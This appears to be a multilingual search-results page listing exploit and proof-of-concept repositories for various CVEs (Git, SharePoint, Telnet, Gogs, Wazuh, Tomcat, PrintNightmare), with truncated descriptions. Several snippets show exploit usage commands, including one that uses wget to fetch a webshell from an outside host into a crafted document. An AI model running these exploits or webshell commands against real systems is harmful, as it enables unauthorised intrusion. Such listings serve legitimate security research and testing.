1144389 matches found
Vulnerabilities found in Check Point VPN products
Check Point has addressed 2 critical vulnerabilities. The vulnerability with the identifier CVE-2026-85102 has a CVSS score of 9.8. This vulnerability resides in the VPN negotiation process of the Quantum Security Gateway and is caused by incorrect validation of certificate trust. As a result, an...
git_rce
CVE-2024-32002:利用 git clone 实现 Git 远程代码执行 该仓库包含 CVE-2024-32002 的 PoC,该漏洞允许在 git clone 操作期间实现远程代码执行。通过以特定方式构造带有子模块的仓库,攻击者可以利用不区分大小写的文件系统上的符号链接处理,将文件写入 .git/ 目录,从而执行恶意钩子。 注意: 此 PoC 仅适用于 Windows 或 Mac 系统。 博客文章 关于此漏洞逆向分析的详细说明,请参见博客文章:https://amalmurali.me/posts/git-rce。 工作原理 1...
CVE-2023-23333
CVE-2023-23333 SolarView Compact hasta 6.00 inyección de comandos en downloader.php RCE nuclei-templates Burp Nuclei...
cve-2026-26114-poc
CVE-2026-26114 Solo para uso en laboratorio o sistemas autorizados para pruebas. PoC en Python root@kitploit: pip install requests requests-ntlm python poc/cve202626114rce.py ^ --target http://sharepoint.local ^ --username spuser1 ^ --password "Password123!" ^ --domain SP19 ^ --cmd "cmd /c whoami...
CVE-2025-1302
CVE-2025-1302 ★ CVE-2025-1302 JSONPath-plus RCE PoC ★ https://github.com/user-attachments/assets/5d791540-ef6c-4cd0-bd25-7a1dbbd194fb Configuración del laboratorio root@kitploit: docker build -t jsonpath:10.2.0 . docker run --rm --name jsonpath -p 3000:3000 jsonpath:10.2.0 localhost:3000...
LeakValue
Android 13 introduce muchas mejoras para endurecer el mecanismo de serialización Parcel Aquí está la presentación del equipo de Seguridad y Privacidad de Android sobre las mejoras realizadas Eso es genial, definitivamente elimina o vuelve inexplotables muchas vulnerabilidades. También describen...
CVE-2020-9484
CVE-2020-9484 PoC para CVE-2020-9484 PoC para CVE-2020-9484 Apache Tomcat RCE por deserialización CVE-2020-9484 Explorar la documentación » Comenzando 1. Clona este repositorio, luego podrás usar CVE-2020-9484 y modificar el código fuente si es necesario. 2. Descarga ysoserial jar 3. Coloca...
CVE-2018-11776
CVE-2018-11776 2018年8月23日,Apache Strust2发布最新安全公告,Apache Struts2 存在远程代码执行的高危漏洞,该漏洞由Semmle Security Research team的安全研究员汇报,漏洞编号为CVE-2018-11776(S2-057)。Struts2在XML配置中如果namespace值未设置且(Action Configuration)中未设置或用通配符namespace时可能会导致远程代码执行。 影响版本 Struts 2.3 to 2.3.34 Struts 2.5 to 2.5.16 修复版本 Struts 2.3.35...
CVE-2025-24016
Wazuh 远程代码执行 RCE - 概念验证 漏洞概述 本仓库演示了 Wazuh 服务器中因 wazuh-manager 包中不安全的反序列化引入的远程代码执行 RCE 漏洞。该漏洞允许具有 API 访问权限的远程攻击者(受损的仪表盘、集群中的 Wazuh 服务器、或某些配置下被攻破的代理)在服务器上执行任意代码。 受影响版本 wazuh-manager 版本 = 4.4.0 已在版本 = 4.9.1 中修复 漏洞描述 该漏洞出现在 Wazuh API 中,其中 DistributedAPI 中的参数被序列化为 JSON,并在...
CVE-2026-1555
CVE-2026-1555 WebStack = 1.2024 - Subida de Archivos Arbitraria No Autenticada 👤 Por: Nxploited 🔗 Nxploited ZeroDay Hub — t.me/KNxploited 💀 CVE-2026-1555 — Subida de Archivos Arbitraria en WordPress WebStack Ejecución Remota de Código no Autenticada a través del manejador AJAXimgupload...
crauEmu
吉祥物由@kottsarapkin 设计 crauEmu 是一个 uEmu 扩展,用于开发和分析代码重用攻击的载荷。 ZeroNights 2019 幻灯片 演示1 - X32-64, Edge, 来自 pwnjs 的 ROP 小工具 演示2 - ARM64, checkm8 回调链 RopEditor 安装 1. 将文件 crauEmu.py 放置在与 uEmu.py 相同的位置。 2. 在 IDA 中使用 File / Script file... 或 ALT+F7 加载 crauEmu.py 。...
process_overwriting
进程覆写 进程覆写是一种 PE 注入技术,与进程空心化和模块重载密切相关。 借助它,你可以替换目标进程的主可执行文件(而非 DLL)。 它仅适用于新创建的进程——该技术不支持注入到现有进程。 警告:目标镜像的大小必须不小于有效载荷镜像的大小。 执行步骤: 1. 从良性文件创建一个挂起的进程(禁用 CFG) 2. 将有效载荷映射到内存,并覆写到原始映射的镜像上(不取消映射原始镜像) 3. 将进程的入口点更新为有效载荷的入口点 4. 恢复进程,执行被替换的 PE !IMPORTANT 阅读常见问题解答 演示: 演示有效载荷(demo.bin)注入到 Windows 计算器(默认目标):...
CVE-2026-24061
CVE-2026-24061 Exploit de RCE en Telnet - Por SafeBreach Labs Este script explota la vulnerabilidad CVE-2026-24061 en servidores Telnet mediante una variable de entorno USER malformada. Uso Ejecute el script con un host de destino: root@kitploit: python telnetrce.py -p Argumentos host: Dirección ...
Boucle-framework
Boucle Hooks de Claude Code que realmente hacen cumplir tus reglas. 7 hooks independientes, además de enforce-hooks para la política de CLAUDE.md, herramientas de auditoría, más de 1,900 pruebas y un corpus de brechas de Claude Code con clasificaciones de gravedad y soluciones. Enlaces rápidos:...
CVE-2021-1675
CVE-2021-1675 - PrintNightmare LPE PowerShell Caleb Stewart | John Hammond | 1 de junio de 2021 CVE-2021-1675 es una vulnerabilidad crítica de ejecución remota de código y escalada de privilegios local denominada "PrintNightmare". Se han publicado exploits de prueba de concepto Python, C++ para l...
Monitorizer
Monitorizer 终极子域名监控框架 安装 ❗ 免责声明 --- 管理员用户可在本地服务器上执行代码,请务必更改默认密码,否则请自行承担风险 使用 Docker root@kitploit: $ curl https://raw.githubusercontent.com/BitTheByte/Monitorizer/main/docker-compose.yml | docker compose -f - up 默认凭据: 一切就绪后,您将能够登录仪表盘:http://127.0.0.1:8000/dashboard/ 用户名| 电子邮件| 密码 ---|---|--- admi...
CVE-2025-8110
Gogs RCE Exploit CVE-2025-8110 Una prueba de concepto PoC para CVE-2025-8110 , una vulnerabilidad crítica en Gogs que permite ejecución remota de código RCE mediante la manipulación de .git/config usando bypass de enlaces simbólicos e inyección de sshCommand. 📖 Descripción general Esta explotació...
eLabFTW-1.8.5-EntityController-Arbitrary-File-Upload-RCE
Exploit Title : eLabFTW 1.8.5 'EntityController' 任意文件上传 / 远程代码执行 Date : 5/18/19 Exploit Author : liquidsky Joseph McPeters Vulnerable Software : eLabFTW 1.8.5 Vendor Homepage : https://www.elabftw.net/ Version : 1.8.5 Software Link : https://doc.elabftw.net/ Tested On : Linux / PHP 版本 7.0.33 / 默认...
CVE-2023-2255
CVE-2023-2255 CVE-2023-2255 RCE 及加载外部资源,由 @Icare1337 发现 https://nvd.nist.gov/vuln/detail/CVE-2023-2255 漏洞利用 仅为在当前目录放置 web shell 的示例。 root@kitploit: python3 CVE-2023-2255.py --cmd 'wget https://raw.githubusercontent.com/elweth-sec/CVE-2023-2255/main/webshell.php' --output 'exploit.odt'...
cve-2021-42013-httpd
Dockerización de una Vulnerabilidad: cve-2021-42013 Este proyecto tiene como objetivo dockerizar una vulnerabilidad específica utilizando Docker. El objetivo es crear un entorno aislado en el cual la vulnerabilidad pueda ser explotada y probada de manera segura. Aplicación vulnerable Apache HTTP...